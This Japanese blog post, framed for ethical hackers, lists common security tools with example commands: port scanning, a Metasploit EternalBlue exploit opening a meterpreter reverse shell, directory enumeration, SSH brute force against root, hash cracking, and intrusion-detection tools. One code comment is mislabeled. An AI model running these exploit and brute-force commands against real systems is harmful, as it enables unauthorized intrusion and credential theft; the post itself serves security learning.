2025年8月19日火曜日

ハッキングツール一覧(ホワイトハッカー編)

 1. ポート・ネットワークスキャン系

  • Nmap:標準。ポート・サービス検出・OS推定まで。

    # 単純なポートスキャン

    nmap 192.168.1.10


    # 開いているポートとサービスを詳細にスキャン

    nmap -sV -O 192.168.1.10


    # 複数ホストをスキャン

    nmap -sV 192.168.1.1-254


  • RustScan:Nmapより速くスキャンして、その結果をNmapに渡せる。

    # 1-65535ポートを高速スキャンしてNmapで詳細情報を取得

    rustscan -a 192.168.1.10 --ulimit 5000 -- -A


  • Masscan:超高速、インターネット全体もスキャン可能。
    → イメージ:攻撃者はまず「どこに何が開いてるか」を確認。

    # 80番ポートをスキャン

    masscan 192.168.0.0/16 -p80 --rate=1000


2. 脆弱性検索・Exploit系

  • Metasploit:ペイロード作成・攻撃実行・脆弱性検証。

    # 80番ポートをスキャン

    msfconsole

    # 使用するモジュール選択

    use exploit/windows/smb/ms17_010_eternalblue

    # ターゲット設定

    set RHOST 192.168.1.10

    set RPORT 445

    # ペイロード設定

    set PAYLOAD windows/meterpreter/reverse_tcp

    set LHOST 192.168.1.5

    run


  • SearchSploit:Exploit-DB検索。ローカルでオフライン利用可能。

    # "Apache Struts" の脆弱性検索

    searchsploit Apache Struts


    # ローカルコピーを利用

    searchsploit -m exploits/linux/remote/12345.py


  • ExploitDB / PacketStorm:公開されている攻撃コード・情報サイト。
    → ポイント:攻撃方法を知り、防御策に活かす。


3. ウェブアプリ列挙・総当たり系

  • Gobuster:ディレクトリ・ファイル・サブドメイン列挙。

    # ディレクトリ列挙

    gobuster dir -u http://example.com -w /usr/share/wordlists/dirb/common.txt


    # サブドメイン列挙

    gobuster dns -d example.com -w subdomains.txt


  • Dirb / Dirbuster:古典的ディレクトリ総当たり。

    dirb http://example.com /usr/share/wordlists/dirb/common.txt


  • WFuzz:フォームやパラメータへのブルートフォース。
    → ポイント:攻撃者が「隠しページや管理画面」を探す手順。

    # ユーザーIDパラメータをブルートフォース

    wfuzz -c -z file,usernames.txt --hc 404 http://example.com/login?user=FUZZ



4. パスワード攻撃・認証突破系

  • Hydra:多プロトコル対応。ログインブルートフォース。

    # SSHログイン試行

    hydra -l root -P passwords.txt ssh://192.168.1.10


  • John the Ripper:ハッシュ解析、パスワード強度チェック。

    # ハッシュファイル解析

    john --wordlist=rockyou.txt hash.txt


  • Hashcat:GPU対応で超高速ハッシュ解析。
    → ポイント:パスワードの弱さがどれだけ危険か体感できる。

    hashcat -m 0 -a 0 hash.txt rockyou.txt


5. 監視・検知系(防御を学ぶため)

  • Snort / Suricata:IDS/IPS。リアルタイムで攻撃検知。

    # Snortでパケット監視

    snort -A console -c /etc/snort/snort.conf -i eth0


  • OSSEC / Wazuh:ログ監視・侵入検知。

    # ログ監視設定(例)

    ossec-control start


  • fail2ban:ログ解析して自動ブロック。
    → ポイント:攻撃手法を知ることで、防御策がより現実的になる。

    # SSHログイン失敗でIPをブロック

    sudo fail2ban-client status sshd


    まとめ

    • 攻撃系ツールは「脆弱性理解」と「防御策の検証」に役立つ。

    • 防御系ツールは「攻撃を知ることでより実践的な対策が取れる」



0 件のコメント:

コメントを投稿

ハッキングツール一覧(ホワイトハッカー編)

  1. ポート・ネットワークスキャン系 Nmap :標準。ポート・サービス検出・OS推定まで。 # 単純なポートスキャン nmap 192.168.1.10 # 開いているポートとサービスを詳細にスキャン nmap -sV -O 192.168.1.10 # 複数ホストをスキャ...